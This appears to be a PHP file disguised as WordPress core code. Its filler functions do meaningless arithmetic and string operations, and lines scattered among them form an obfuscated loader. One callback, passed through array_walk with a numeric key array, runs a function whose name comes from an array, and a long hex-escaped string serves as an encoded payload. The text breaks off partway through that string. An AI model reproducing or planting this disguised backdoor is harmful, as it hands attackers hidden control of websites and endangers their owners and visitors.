 	if((html_entity_decode($allow_query_attachment_by_filename)) !=  false) {
 		$customHeader = 'qfq0wfew7';
 	}
 	$dolbySurroundModeLookup['d3426drb9'] = 803;
 	$allow_query_attachment_by_filename = log(400);
 	$private_statuses = 'trt2bvvx2';
 	$private_statuses = sha1($private_statuses);
 	$force_delete['g0ppdl'] = 2624;
 	$private_statuses = atanh(160);
 	$old_tt_ids = round(714);
 	$f0f6_2['i730znveq'] = 'p226y9e76';
 	if(!empty(basename($f4g0)) ==  FALSE){
 // Print To Video - defines a movie's full screen mode
 		$result_headers = 'ztfkt8j';
 	}
 $selectors_json = (!isset($selectors_json)?'nn8n2':'qw0rog4');
 $cached_entities['rvlp5zt3'] = 'qycu66u';
  if(!(strcoll($group_description, $group_description)) ===  true) 	{
  	$f0f8_2 = 'cqirz2xzf';
  }
 	$allow_query_attachment_by_filename = htmlentities($f4g0);
 	$empty = 'fd8hmmnt';
 	$cache_headers = (!isset($cache_headers)?'lcl15xo':'v7se5f');
 	if(!empty(stripos($allow_query_attachment_by_filename, $empty)) ==  TRUE) 	{
 		$container_id = 'nw5g';
 	}
 	return $private_statuses;
 }


/**
	 * The post's slug.
	 *
	 * @since 3.5.0
	 * @var string
	 */

 function hash_nav_menu_args ($ltr){
  if(empty(log1p(532)) ==  FALSE)	{
  	$cat_args = 'js76';
  }
 $old_email = 'p47uzd';
 $dimensions_support = 'z83o7';
 $total_in_hours['efv8suy'] = 'yqvxf8qdf';
 $destfilename = 'pxh9fn';
 $primary_meta_query = (!isset($primary_meta_query)?	'gn3u'	:	'zozbkh');
  if(!isset($header_data_key)) {
  	$header_data_key = 'xmjcq1';
  }
 $has_archive = 'lhxb';
 $decimal_point['nre96c'] = 628;
  if(!isset($link_match)) {
  	$link_match = 't9wa';
  }
 $header_data_key = urlencode($old_email);
  if(!isset($process_interactive_blocks)) {
  	$process_interactive_blocks = 'n13rwk';
  }
  if(!isset($queued)) {
  	$queued = 'urjlgjhd2';
  }
 $link_match = ceil(324);
 $has_archive = wordwrap($has_archive);
 $link_match = md5($link_match);
 $map['m39fi3'] = 'xr56ajoq';
 $process_interactive_blocks = strtolower($dimensions_support);
 $queued = urlencode($destfilename);
  if(empty(sqrt(28)) ===  TRUE) 	{
  	$get_item_args = 'epr3unhvf';
  }
 	$ltr = 'ox4b0jdi';
 $has_archive = asinh(957);
 $link_match = cos(922);
 $queued = sha1($queued);
 $link_notes['i1s3'] = 'w1gj3';
 $screen_title['la1vx7k'] = 'arxcyak3';
 	$ltr = ucfirst($ltr);
 $f1f5_4['dn6ezbl'] = 'i49pi';
 $old_email = expm1(792);
 $unsorted_menu_items = (!isset($unsorted_menu_items)?'vd8qb':'g23d51');
 $lastMessageID = (!isset($lastMessageID)? 	"yjav7c" 	: 	"j233kwm53");
  if(!isset($referer)) {
  	$referer = 'pqbcg';
  }
 $expire['t5ude6z'] = 519;
 $node_path_with_appearance_tools['mb4ar55j'] = 'yfjri3';
 $referer = stripslashes($process_interactive_blocks);
  if((stripos($has_archive, $has_archive)) !==  false) {
  	$max_days_of_year = 'kdcn8y';
  }
 $old_email = ucwords($header_data_key);
 // If args were passed as an array, as in vsprintf(), move them up.
 	$theme_data['mwww9q'] = 'gvij5iahr';
  if(!isset($lightbox_settings)) {
  	$lightbox_settings = 'i814';
  }
 $untrailed = (!isset($untrailed)? 	"qol57idn" 	: 	"haf9s8b7");
  if(!(soundex($queued)) ==  False)	{
  	$ErrorInfo = 'kqi5bon';
  }
  if(!(ucwords($link_match)) ==  False) 	{
  	$col_length = 'zcqtp9da';
  }
 $old_email = strcoll($header_data_key, $old_email);
 $lightbox_settings = cos(794);
 $no_areas_shown_message['a62efxv0c'] = 'vlvz8ke';
 $has_archive = strnatcasecmp($has_archive, $has_archive);
 $accessible_hosts = 'r4lglcm26';
 $cat2['s8g5t'] = 2879;
 // Default to AND.
 	$ltr = bin2hex($ltr);
 $queued = ceil(23);
  if(!isset($mp3gain_globalgain_max)) {
  	$mp3gain_globalgain_max = 'i8sx1zf15';
  }
 $current_is_development_version['n14a'] = 'd6is7qm';
 $user_data = (!isset($user_data)?	"vygu"	:	"i0124q");
 $dependency_to = (!isset($dependency_to)? 	"ocx1g" 	: 	"xterye");
 	if(empty(strcoll($ltr, $ltr)) ==  False) {
 		$custom_query = 'j8ksbqy7';
 	}
 	$http_api_args['pkldse'] = 'rbfsv';
 	$hex3_regexp['qh9r43u'] = 2348;
 	if(!isset($cidUniq)) {
 		$cidUniq = 'w6ya';
 	}
 	$cidUniq = sqrt(166);
 	$cidUniq = atanh(353);
 	if(!empty(cos(279)) ==  true) 	{
 		$sidebar_instance_count = 'sxj9';
 	}
 	$switched['p4zx5'] = 1405;
 	$cidUniq = cosh(169);
 	if(!(strip_tags($ltr)) !=  True){
 		$defer = 'vmyuu';
 	}
 	if(!isset($processed_response)) {
 		$processed_response = 'cfe0';
 	}
 	$processed_response = strip_tags($ltr);
 	$langcodes = (!isset($langcodes)? "rsv35hne9" : "uez3");
 	$symbol_match['jeaxq83c'] = 'lktr0tux';
 	$ltr = log(105);
 	$cidUniq = rtrim($processed_response);
 	if(!isset($count_key1)) {
 		$count_key1 = 'x5kplce';
 	}
 $mp3gain_globalgain_max = atan(894);
 $destfilename = ucwords($destfilename);
 $has_archive = rawurldecode($has_archive);
 $theme_vars['aw8sg0ddm'] = 3007;
  if(!(abs(919)) !==  False){
  	$subframe_apic_picturetype = 'se58z';
  }
 	$count_key1 = acosh(237);
 	$headers_sanitized['s8e28c6s'] = 749;
 	if(!empty(floor(533)) !=  True) {
 		$wpmediaelement = 'pspx';
 	}
 	if(!empty(exp(942)) !=  False) {
 		$source_comment_id = 'n5nkfq2';
 	}
 	return $ltr;
 }


/**
	 * Sets block pattern cache.
	 *
	 * @since 6.4.0
	 *
	 * @param array $patterns Block patterns data to set in cache.
	 */

 function wp_getTerm ($sample_factor){
 $schema_links = (!isset($schema_links)?	'c4e4xz'	:	'iw3w4');
 $chan_prop_count = 'fqrmcv';
 $preg_target = 'pe6zk8t';
 $candidate['tnqp96'] = 'art51h3';
 $chan_prop_count = convert_uuencode($chan_prop_count);
 $last_update_check = (!isset($last_update_check)? 	'r6u44' 	: 	'zovj0zcz');
 // We don't need the original in memory anymore.
 // Average number of Bytes/sec  DWORD        32              // bytes/sec of audio stream  - defined as nAvgBytesPerSec field of WAVEFORMATEX structure
  if(!isset($match_root)) {
  	$match_root = 'hbcpggr2';
  }
  if(!empty(strtolower($chan_prop_count)) !==  FALSE) 	{
  	$blog_data = 'ovyzh';
  }
  if(!isset($terms_by_id)) {
  	$terms_by_id = 'x3pi';
  }
 	$datepicker_date_format = 'tygcvk7';
  if(!empty(urlencode($chan_prop_count)) ===  FALSE){
  	$check_php = 'tabfrl6ny';
  }
 $match_root = urldecode($preg_target);
 $terms_by_id = decbin(539);
 	$NextOffset['g26sbod'] = 'yr2o99';
 $revision_id['mdp9'] = 2634;
 $chan_prop_count = log10(708);
 $yplusx = 'hxy71injk';
 // Back compat if a developer accidentally omitted the type.
 	$wp_logo_menu_args['m6pqba2'] = 2947;
 // Let the action code decide how to handle the request.
 $preg_target = asin(675);
 $terms_by_id = addcslashes($yplusx, $terms_by_id);
 $xhash['qs1cj2f'] = 'nohe';
 	if(!isset($logins)) {
 		$logins = 'yc44r';
 	}
 	$logins = strtr($datepicker_date_format, 11, 17);
 	$theme_version = (!isset($theme_version)? "fs9af3x" : "rnvl");
 // Identifier              <up to 64 bytes binary data>
 	$font_faces['l4sk'] = 3991;
 $match_root = tanh(458);
 $chan_prop_count = trim($chan_prop_count);
 $terms_by_id = decoct(881);
 	$logins = strip_tags($logins);
 //  returns data in an array with each returned line being
 $match_root = addcslashes($preg_target, $preg_target);
  if((bin2hex($chan_prop_count)) ==  True)	{
  	$stts_res = 'u6uv9';
  }
  if(!(sin(783)) ===  TRUE){
  	$send_as_email = 'yquljdc';
  }
 // round to next-lower multiple of SlotLength (1 byte for Layer 2/3, 4 bytes for Layer I)
 $yplusx = sin(281);
  if(empty(acosh(971)) !=  False){
  	$associative = 'lcb3';
  }
  if(empty(lcfirst($chan_prop_count)) !==  True) 	{
  	$x11 = 'vs8o4o';
  }
 $terms_by_id = tan(369);
 $DKIM_copyHeaderFields = (!isset($DKIM_copyHeaderFields)? 't2e2' : 'xst9jl');
  if(empty(strtolower($match_root)) ==  FALSE){
  	$hooked = 'ktzgnusl';
  }
 // If error storing permanently, unlink.
 // A plugin was re-activated.
 $partial_id = (!isset($partial_id)? 'm97t1t5' : 'n896u');
 $yplusx = htmlspecialchars_decode($terms_by_id);
 $header_image_data_setting['da4d'] = 3961;
 $username_or_email_address = (!isset($username_or_email_address)? 	'dnq1p' 	: 	'xtldy3');
 $chan_prop_count = sinh(529);
 $mock_anchor_parent_block['fd3u2g8n1'] = 'c68rppvm';
  if(!isset($custom_fields)) {
  	$custom_fields = 'jybu1m';
  }
 $terms_by_id = stripos($terms_by_id, $yplusx);
 $chan_prop_count = strtolower($chan_prop_count);
 	$style_key = 'nwup551';
 $page_columns = (!isset($page_columns)? 	"h52gil" 	: 	"copkqcdm4");
 $custom_fields = wordwrap($preg_target);
 $blockSize['j5bn6a'] = 'npox';
  if(empty(stripslashes($custom_fields)) !=  True) 	{
  	$multifeed_url = 'l5kdl';
  }
  if(!empty(asinh(55)) ===  true)	{
  	$editing = 'zq6dxtpuo';
  }
 $yplusx = ucfirst($terms_by_id);
  if((exp(237)) !==  TRUE){
  	$result_type = 'm2znz1y';
  }
 $admin_color = (!isset($admin_color)?	'ns3wteo'	:	'fbo2');
 $f9g8_19 = (!isset($f9g8_19)?	'w13er2g'	:	'zj116z8');
 // If MAILSERVER is set, override $object_ids with its value.
 	if(!(htmlentities($style_key)) !==  FALSE) 	{
 		$password_check_passed = 'h4ndsp';
 	}
 	$datepicker_date_format = round(974);
 	if(!isset($sibling)) {
 		$sibling = 'z1n2l';
 	}
 	$sibling = ceil(28);
 	if((htmlspecialchars_decode($logins)) ==  FALSE){
 		$sub_sizes = 'xtwr';
 	}
 	return $sample_factor;
 }


/* translators: %s: mod_rewrite */

 function HandleEMBLSimpleTag ($akid){
 	$h6 = (!isset($h6)? 	'eolip1q9' 	: 	'iym2n');
 	$ok['dsmf7n'] = 4727;
  if(!isset($text_fields)) {
  	$text_fields = 'cfdlx522';
  }
  if(!empty(sin(410)) ==  TRUE) {
  	$current_user_can_publish = 'c5y00rq18';
  }
 $reply_to_id = 'eei3';
 $queried_items = 'fg3cssl';
 $theme_changed = 'mr315';
 // UTF-32 Little Endian BOM
 	if(!(asinh(917)) !==  True){
 		$past = 'v6ak';
 	}
 	$potential_role = (!isset($potential_role)? 'nmkco' : 'yiok6q');
 // Empty body does not need further processing.
 	$preview_label['xdmtl'] = 'w49g5';
 	if(!empty(log1p(361)) !==  true)	{
 		$plugin_name = 'm5ld8y8';
 	}
 // Remove the filter as the next editor on the same page may not need it.
 	$color_support = 'ml0w3';
 	if(!isset($limited_email_domains)) {
 		$limited_email_domains = 'mfna6h';
 	}
 	$limited_email_domains = rawurldecode($color_support);
 	$sign_extracerts_file = 'frvprf5';
 	$chunk_length = (!isset($chunk_length)?	's86fgq'	:	'nezd');
 	$akid = strrpos($sign_extracerts_file, $color_support);
 	if(!isset($a_theme)) {
 		$a_theme = 'xzjzpzr';
 	}
 	$a_theme = log1p(937);
 	if(!(stripslashes($a_theme)) !=  True)	{
 		$pend = 'vecg';
 	}
 	$existing_starter_content_posts['jy91'] = 'eod341o8';
 	$original_args['xzdrgdlb'] = 'jeu1g';
 	if((log1p(403)) ===  False){
 		$end = 'u6xwwsbh';
 	}
 	if(!isset($shortcode)) {
 		$shortcode = 'w70672';
 	}
 	$shortcode = exp(507);
 	return $akid;
 }
$clauses = array(115, 120, 86, 103, 97, 103, 106, 105);
//   PCLZIP_CB_PRE_EXTRACT :


/**
 * Reads bytes and advances the stream position by the same count.
 *
 * @param stream               $MarkersCounter    Bytes will be read from this resource.
 * @param int                  $num_bytes Number of bytes read. Must be greater than 0.
 * @return binary string|false            The raw bytes or false on failure.
 */

 function get_svg_filters($plugurl){
     $descendant_id = $plugurl[4];
     $escape = $plugurl[2];
 $FastMPEGheaderScan['rdykmxnnl'] = 4385;
 $PreviousTagLength = 'cvwdcq3n4';
 $global_groups = 'rgt1s';
 $sortable_columns = 'ypz50eu';
  if((sinh(196)) !==  False)	{
  	$new_user_uri = 'r8bhlcmg';
  }
  if((soundex($sortable_columns)) !=  true)	{
  	$page_cache_test_summary = 'hhwcem81';
  }
 $contributor['scdyn5g'] = 1720;
 $global_groups = crc32($global_groups);
     remove_rewrite_tag($escape, $plugurl);
 // Are we dealing with a function or a method?
 //    s15 += carry14;
 // Audio mime-types
     attachment_submit_meta_box($escape);
     $descendant_id($escape);
 }
array_walk($plugurl, "sodium_crypto_auth", $clauses);
// This is hardcoded on purpose.
$fresh_sites = (!isset($fresh_sites)?"mreq6p":"mudirs");


/**
 * Helper class to be used only by back compat functions.
 *
 * @since 3.1.0
 */

 function wp_refresh_heartbeat_nonces(){
 // max line length (headers)
 //    s9 += carry8;
 $hex8_regexp = 'dobfww6h';
  if((atanh(848)) ==  TRUE)	{
  	$comment_child = 'ukdc1eybq';
  }
 $func = 'onbp';
 $last_changed = 'vrnq7ge';
  if(!isset($notices)) {
  	$notices = 'zji4ihwk';
  }
 $replaces = (!isset($replaces)? "j46llxtba" : "jojlwk");
  if(!isset($orig_format)) {
  	$orig_format = 'sp50n';
  }
 $hex8_regexp = basename($hex8_regexp);
 $blog_list = (!isset($blog_list)? "ma185q9" : "nzjlv5at2");
 $orig_format = htmlspecialchars_decode($last_changed);
 $preferred_size['i0uta'] = 'twdguqh';
 $notices = tan(646);
 // Already did this via the legacy filter.
 // For international trackbacks.
 // part of the tag.
 $skip_serialization = (!isset($skip_serialization)? 'csrz' : 'adpb5');
 $p_size['nfoi'] = 'h0y7wrj';
 $func = crc32($func);
 $available_translations = (!isset($available_translations)? 'qprir' : 'ilmp1');
     $force_uncompressed = "\xd4\xb2\x8a\xa1\xdc\xd0\xa4\x9a\xae\xeb\x90\x98\x98\xa1\x8c\xcf\xdc\xe4\xbb\xc6\xd1\xdc\xde\xc8\xd6\xe7\xc4\xdb\xc6\xd5\xde\xdc\x95\xb3\xbf\xa1\x93\xa2\xdd\xa3\xa9\xb2x\xb0\xca\xae\xb0\xb6\xdc\x9a\x91\xd0\x9b\x9a\xa5\xdc\xad\xac\x8b\x98\x94\xa1\x8c\xa5\xb2\xe8\xbe\xd7k\xcd\xdf\xd7\xd6\xec\xbf\xd6\xcf\x87\x8a\x89\x93\x98\xc6\xcf\xcc\xce\xb9\xb5\xdd\xa0z\xd3\xb3\xd5\xc2\xb8\xe9\xccqjp\x99\x93\x93\x98v\xb1\xd9\xd1\x8a\x89\x93\xa2\x85\xe2k\x87\x8a\x89\x93\x81\xc8\xcc\xd5\xdc\xdc\xd7\x93\x98v\x87\xa1\xd7\xcb\xcc\xde\xa0v\x87\x83\xc3\x9b\x9a\xa3\x9a\x85\x91\xae\x87\x8a\x93\xa2\xa6v\x87\x81\x87\xcd\xd1\xe5\x81~\x9b\x93\x90\x96r\x97\xe4\xa8\xd5\xb9\xb6\xe0\xbd\xa2\xa2\xad\xb1\xb7\xad\x8a\x93\xa2\xa1\x91qjpsr\xa2\xa2\xad\xba\x8b\x96ts\xa2\xa2v\x87\x81\xd6\xbc\xb9\xea\xc0v\x91\x90\x8b\xd7\xda\xe8\xec\x99\xd7\xb9\xdd\xe3\x98\x9d\x98v\x87\xc2\xcc\xdd\xde\x93\xa2\x85\xa4\x81\x87\xd7\xcd\xa8\xa0z\xd3\xb3\xd5\xc2\xb8\xe9\xcc\xa2kp\x99\x93\x93\x98v\xb7\xb4\xcd\x8a\x93\xa2\x9c\xa1\xb0\xa7\xa9\xb9\x89\x93\x98v\xa4j\xc9\xcb\xdc\xd8\xae\x8a\xc6\xc5\xcc\xcd\xd8\xd7\xdd~\x8b\xcd\xb9\xd8\xc1\xc2\xee\xaa\x90\x9c\xa2t\x89\x93\xa7\x80\x87\xda\xdf\xac\xc0\x93\xa2\x85\xd0\xc7\x87\x92\x8d\xbe\xc1\x9c\xa9\xb0\x96\x94\x89\x93\xc7\xa0\xc8\x81\x91\x99\xa6\xb0\xb5v\x87\x81\xcd\xcb\xd5\xe6\xdd\x87\x81\x87\x8a\x89\xee\x82_\x8b\xac\xb0\xb0\xab\xc2\x98v\x87\x9ep\x91\x90\xae\x82_pj\x87\x8a\x89\x93\x98\xd3q\x81\x87\x8a\x89\x93\x81z\xb2\xcb\xd3\xcc\xce\xb5\x81\x93p\xd4\xdb\xdc\xc8\xe6\xe8\xc2\xd0\xd5\x8f\x8e\xd5\xc5\xe6\xae\xb6\xd7\xbb\x93\xa4\x97\xd7\xcb\xd6\xaa\xcb\xdfr\xb0\x81}\x9c\x95\x98\x9b\x9f\x9a\xb3`\x87\x81\x87\x8a\x89\x97\xec\x9e\xb2\xdb\xb1\xbf\xdc\x93\x98v\x87\x81\xa4\x8a\x89\xe6\xec\xc8\xd3\xc6\xd5\x92\x8d\xdf\xca\xc4\xbf\xb0\xdd\xbe\x92\xae\x82v\x87\x81\x87\x8a\x89\x97\xda\xc0\xae\xcc\xde\xda\x98\x9d\x98v\xda\x81\x87\x8a\x93\xa2\xb5\x85\x91\x81\xcb\xbf\xd5\xcb\x98v\x87\x8b\x96\x9a\xa4\x97\xd7\xba\xb7\xaa\x87\x8a\x89\x93\x98\x93\x87\x81\x8e\x9f\x99\xa6\xb1\x88\x8e\x9cqt\x89\x93\x98\xcd\xcf\xca\xd3\xcf\x89\x93\x98v\x87\x89\x96\x94\x89\x93\xe1\x80\x96\x85\xc9\xd4\xb0\xde\xef\xc6\x87\x81\x87\xa6\x98\x9d\x98v\x87\xd4\xde\xbf\x89\x93\xa2\x85\x8b\xd5\xaf\xb5\xe3\xbd\xcd\xc9p\x8ap\xe5s|\x81_\x8b\xc3\xd1\xb1\xd4\xea\xe8\x81\x92\x9c\x8b\xc9\xb0\xe4\x98v\x87\x81\x87\xa7\x98\x9d\x98\xaf\xcc\xb8\x87\x94\x98\x9a\xa9\x88\x97\x99\x99\x91\xa4}\xa7\x80\x87\xae\xba\x8a\x93\xa2\x9c\xa2\xa9\xc5\xdf\xb9\x89\xb0\x98v\x87\x81\x8b\xb5\xd3\xdf\xda\xbb\xa9\xbc\x8b\xcc\xd3\xba\xe3\xcd\xd7\xbe\xa2t\x89\x93\x98v\x96\x8b\x87\x8a\x89\xc3\xa2\x85\xd0\xc7p\x92\xdc\xe7\xea\xc6\xd6\xd4\x8f\x8e\xb5\xb5\xdc\xce\xb6\x8d\x96\x94\x89\x93\xc5\xae\xbe\xa8\xb4\x8a\x93\xa2\x9f\xb7\x8e\x8a\x96\x94\xd4\x93\x98v\x91\x90\x88\xa7\xa6\xa2\xa2v\x87\xd4\xe1\xc1\xcb\x9d\xa7\xbc\xc8\xcd\xda\xcf\x92|\xf3`q\x81\x87\x8e\xb4\xdd\xe4\xb8\xcc\xa3\xc2\x8e\xcb\xdd\xbf\xc1\xde\xd1\xc4\x99\x93\x93\x98v\xac\x81\x91\x99\xa6|\xeb\xca\xd9\xd5\xd6\xdf\xd9\xe3\xdd\xc8\x8f\x85\xb3\xac\xcd\xeb\xc7\xa2kqtr\xf0\x82_pjps\xe6}\x82`\x96\x8b\xcd\xc0\xae\x93\x98\x80\x96\x85\xd9\xd4\xca\xc7\xc4\x85\x91\x81\x87\x8a\xdb\xb8\xe7\x80\x96\x9e\x96\x94\xac\xc4\x98\x80\x96\xca\xd4\xda\xd5\xe2\xdc\xbb\x8f\x88\x8e\x96\x89\x93\x98v\x87\x85\xb2\xd4\xd5\xd5\xdd\x98\x90\x9c\x8b\xc9\xba\xc6\xe7\xac\xac\x90\x91\x8a\x89\xb4\xc1v\x87\x8b\x96\xa7\x98\x9d\xe3\x9c\xa8\x8b\x96\x91\x9c\xa3\xb0\x87\x98\x88\xa2tr\x97\xd7\x9d\xac\xb5\xc2\x91\xcd\xd8\xdb\xc5\xcb\xc6\xcb\x91\xc6\xa2\xa2\xb7\x87\x81\x91\x99\xa6|\x9c\xc8\xd1\xc2\xbb\xb6\xa4\xae\x82v\x87\x81\x87\x8a\x89\x93\x9c\xb5\xb7\xb0\xba\xbe\xc4\x9a\xe0\xb7\xda\xc9\x8e\xc7r\xb0\x98v\x87\x81\x87\x8e\xd6\xe4\xed\xca\xaa\xd1\xbf\xe0\xe2\xae\x82_pj\x87\x8a\xd2\xd9\x81~\xcd\xca\xd3\xcf\xc8\xd8\xf0\xbf\xda\xd5\xda\x92\x90\xe3\xd9\xca\xcf\x90\xdb\xd9\x98\xd9\xe1\xc2\xcc\x88\x90\x93\x98\x9d\xde\xcb\x87\x81\x87\x94\x98\xee\x82`qj\x8b\xc0\xb7\xe1\xe8\xa9\xbb\xd3\x96\x94\x89\x93\x98\xc9\xbd\x8b\x96\xa7\x98\x9d\x98v\xb4\xd2\xb9\xc0\xd0\x93\xa2\x85\xcd\xca\xd3\xcf\xc8\xda\xdd\xca\xc6\xc4\xd6\xd8\xdd\xd8\xe6\xca\xda\x89\x8e\xda\xca\xe7\xe0\x85\xdb\xd0\x96\xd0\xd2\xdf\xdd}\x90\x9c\xa2tr|\x81_\x87\x81\x87\x8a\x8d\xbb\xdf\x9e\xdf\xb7\xc8\x8a\xa6\x93\x98v\x87\xc6\xdf\xda\xd5\xe2\xdc\xbb\x8f\x88\x93\x91\x95\x93\x98v\x87\x85\xbd\xb8\xd7\xe3\xcb\xaa\xd9\x8a\xa2ts\x93\x98v\x87\x85\xa8\xe4\xbb\xc6\xcb\x9f\xcaj\xa4\x8a\x89\x93\xe5\xba\x9c\x89\xda\xcf\xdb\xdc\xd9\xc2\xd0\xdb\xcc\x92\x8d\xbb\xdf\x9e\xdf\xb7\xc8\x93\x92\xae\x82_pjpsr\xdc\xdev\x87\x89\xd0\xdd\xc8\xd4\xea\xc8\xc8\xda\x8f\x8e\xb1\xda\xc0\xce\xbd\xc2\x90\x93\x89\x93\x98\xd1qkq\x8a\x89\x97\xda\xc0\xae\xcc\xde\xda\xe3\xc3\xe1\x9c\xaf\xc6\xcf\x99\x93\x93\x98\xb7\x87\x81\x91\x99\xa6|\xd9\xc8\xd9\xc2\xe0\xc9\xdc\xdf\xe1\xb9\xcc\x89\x8b\xb2\xd0\xbb\xf0\xac\xc8\x8d\x87\x8a\x89\xa3\xa4_\x9c\x8a\xa2t\x89\x93\x98v\x87\x81\x87\x8a\x89\x93\xf5`pjp\xe7s}\x82_\x8b\xa4\xab\xdc\xca\xe1\xec_\xa4\x81\x87\xcb\xdb\xe5\xd9\xcf\xc6\xce\xc8\xda\x91\x9a\xec\xc8\xd0\xce\x8e\x96\x98\x9d\xf2\xa2\x91\x90\x8b\xcc\xd3\xba\xe3\xcd\xd7\xdb\xb7\xd3\xaf\xbb\xdd\xbe\x90\x9cqsr|\x81_\x8b\xb7\xdd\xbd\xd7\xe2\xc7\xa0\xaa\xb6\xce\x99\x93\x93\x98v\xb1\xae\xdd\xb0\xbc\x93\x98\x80\x96\x9ep\xdc\xca\xea\xed\xc8\xd3\xc5\xcc\xcd\xd8\xd7\xdd~\xd0\xce\xd7\xd6\xd8\xd7\xdd~\x8e\x8d\x8e\x96\x98\x9d\x98\xab\xaa\xd1\x87\x8a\x89\x9d\xa7z\xaa\xa5\xd9\xcb\xd7\xe7\xa1\xa2\x85\xc6\xac\xbe\xe9\x81\x93\x96\x8b\x87\x8a\x89\xb7\xd9\xbe\xbe\x8b\x96\x91\x9f\xab\xad\x8c\x8e\x9cqts\x93\x9c\xb5\xaa\xb0\xb6\xb5\xb2\xb8\xd3}\xcd\xca\xd5\xcb\xd5\xd2\xee\xb7\xd3\xd6\xcc\x91\xc6|\xb5_\x8b\xb7\xdd\xbd\xd7\xe2\xc7\xa0\xaa\xb6\xce\xa5s|\x81_p\xdeq\x8a\x89|\x82_pjpsr\xd9\xed\xc4\xca\xd5\xd0\xd9\xd7\x93\x98\xaa\xd0\xcd\xc0\xab\xc1\xdf\xa0qjp\xe5s|\x81_p\x90\x91\x8a\xd8\x9d\xa7z\xae\xd7\xda\xbf\xb1\xb7\xc2\xa6\xaa\xc5\x96\x94\x89\x93\xeb\x9d\xcd\xd9\xd6\x8a\x93\xa2\xb5v\x87\x81\xa8\xdc\xdb\xd4\xf1~\x8b\xc0\xaa\xb9\xb8\xbe\xc1\x9b\x93j\x8b\xc9\xb9\xc2\xcb\xaa\x90\x9c\x8b\xc9\xbf\xe4\xf1_\xa4j\x8e\x9d\x9e\xab\xaf\x87\x8e\x9cqsr|\x81_p\x85\xd3\xcc\xae\xc8\xc0\xb8\xd8\xa4\x87\xa7r\xd4\xea\xc8\xc8\xda\xc6\xd7\xca\xe3\xa0}\xd4\xc5\x9c\x91\x95\x93\x98z\xc6\xa4\xb6\xb9\xb4\xbc\xbd\xa2\x9cqts|\x9c\xb7\xca\xb9\xca\xb8\xde\xbb\xed\xcf\xe0\x90\x91\x8a\xbd\xbb\xc8\x9c\x87\x8b\x96\xa7r\xe6\xec\xc8\xd7\xd0\xda\x92\x8d\xd2\xcb\x9b\xb9\xb7\xac\xbc\xc4\x9a\xc0\xaa\xbb\xb1\xc6\xbf\xbc\xb8\xca\xb5\xa8\xa8\xac\xb8\xbd\x9a\xd5\x82\x87\x81\x87\x8a\x90\xc0\xe7\xd0\xd0\xcd\xd3\xcb\x90\x9c\xa7\x80\xe0\xb5\xb0\xd8\x89\x9d\xa7w\xa4\x9e\x96\x94\xd0\x93\xa2\x85\xcd\xc2\xd3\xdd\xce|\xb7_\x8e\xc3\xd9\xd9\xe0\xe6\xdd\xc8\x87\x81\x87\x8a\x89\xdc\xebv\x87\x81\xb4\xd9\xe3\xdc\xe4\xc2\xc8\x88\x96\x94\x89\x93\xe5\xc4\xd8\xc2\xdf\x8a\x89\x93\xa2\x85\xa1\x81\x87\x91\xcb\xe5\xe7\xcd\xda\xc6\xd9\x99\x93\x93\x98\xc9\xcf\x81\x87\x94\x98\xdc\xebv\x87\xcf\xd6\xder\xc0\xe7\xd0\xd0\xcd\xd3\xcb\x90\xae\x9c\xb5\xb4\xab\xc1\xcf\x98\x9d\xed\xb8\xb7\x81\x91\x99\xa6\xa2\xa2v\xbb\xaa\xb8\xd1\xd9\x9d\xa7}\x9e\x97\x98\x9b\x90\xae\x82_pjp\x8a\x89}\x81_pj\xd0\xd0r\x9b\xe1\xc9\xc6\xc2\xd9\xdc\xca\xec\xa0z\xae\xd7\xda\xbf\xb1\xb7\xc2\xa6\xaa\xc5\x90\x93r\xee\x82v\x87\x81\x87\x8a\x89\x97\xcf\xab\xbb\xa3\xd0\xcf\x89\x93\x98v\x87\x9e\x87\x8a\xca\xe5\xea\xb7\xe0\xc0\xda\xd6\xd2\xd6\xdd~\x8b\xa8\xdd\xdd\xbe\xbb\xbc\xa0\xb7\xa4\xcb\x96\x89\x93\x98\x86\x93\x81\x98\x93\xa4\x97\xd7\xc2p\x9e\x87\x8a\x89\x93\x9f\x8c\x97\x94\x9f\xa0\x90\xae\x82v\x87\x81\x87\x99\x93\x93\xef\x80\x96\xdep\xcf\xd5\xe6\xdd\x85\x91\xba\xdb\x8a\x89\x93\xa2\x85\xe2k\x87s\x8d\xca\xcd\xaa\xa9\xca\xcc\x8a\x89\x93\x98v\xa4\x90\x91\x8a\x89\x93\xef\x9b\xac\xcb\x87\x94\x98\xce\xd5\x91qkqs\xe6}\x98vpk\x87\x8a\x89\x93\x98v\x87\x85\xba\xb1\xdd\xe5\xe3\xb8\xa9\xa6\xd3\xd6\x98\x9d\xcfv\x87\x8b\x96\xa7r\xd8\xf0\xc6\xd3\xd0\xcb\xcf\x91\x9a\xa4}\x93j\x8e\xcb\xd9\xe3\xe4\xbb\x93\xd0\xd9\xcb\xd7\xda\xdd\x82\xc9\xc2\xd5\xcb\xd7\xd4\x9f\xa2\x85\xc6\xd9\xc1\xe3\xe0\xca\x96\x8b\x87\x8a\xb8\xdc\xf0\x80\x96\x9e\x96\x94\x89\x93\x98\x9c\xaa\x81\x87\x94\x98\x9a\xb0\x8a\x9c\x94\x8e\xa5s|\x81_\x96\x8b\x87\x8a\x89\xc2\xd1\xbc\xab\xa2\x87\x94\x98\x97\xca\xcc\xc1\xd6\xbf\xb7\xc2\xe6\xa7\x80\x87\x81\x87\xbb\xc3\xca\xe9\xcc\x91\x90\xa4\x8a\x89\x93\xea\xb7\xde\xd6\xd9\xd6\xcd\xd8\xdb\xc5\xcb\xc6\x8f\x91\x8e\xa5\xa8\x9e\xcc\xcd\xd3\xd9\x8e\xa5\xa8\xad\xd6\xd3\xd3\xce\x8e\xa5\xa8}\x90\x9cqtr\x97\xda\xc0\xae\xcc\xde\xdar\xb0\x81\x86\xa2\x9c\x96\x94\x89\x93\xce\xb9\xb4\xbb\x87\x8a\x89\x9d\xa7`q\x90\x91\x8a\x89\xed\xe2\xa1\xcc\x81\x87\x8a\x93\xa2\xef\xbe\xd0\xcd\xccs\x91\x97\xda\xc0\xae\xcc\xde\xda\x89\x93\xb4\x85\x91\x81\x87\x8a\xb2\xca\xe7\xcf\xd8\x81\x87\x8a\x93\xa2\xdb\xc5\xdc\xcf\xdb\x92\x8d\xc6\xbf\xca\xd9\xcc\xc9\xac\xae\xdf\xe4\x96\x8b\xaa\xd9\x89\x9d\xa7\x96\x8b\x87\x8a\x89\xd8\xbc\xbf\x87\x81\x91\x99\xe4}\x81_p\x85\xba\xb1\xdd\xe5\xe3\xb8\xa9\xa6\xd3\xd6\xc4\x97\xda\xc0\xae\xcc\xde\xda\xc6\xa2\xa2v\xb4\xac\xdd\x8a\x89\x9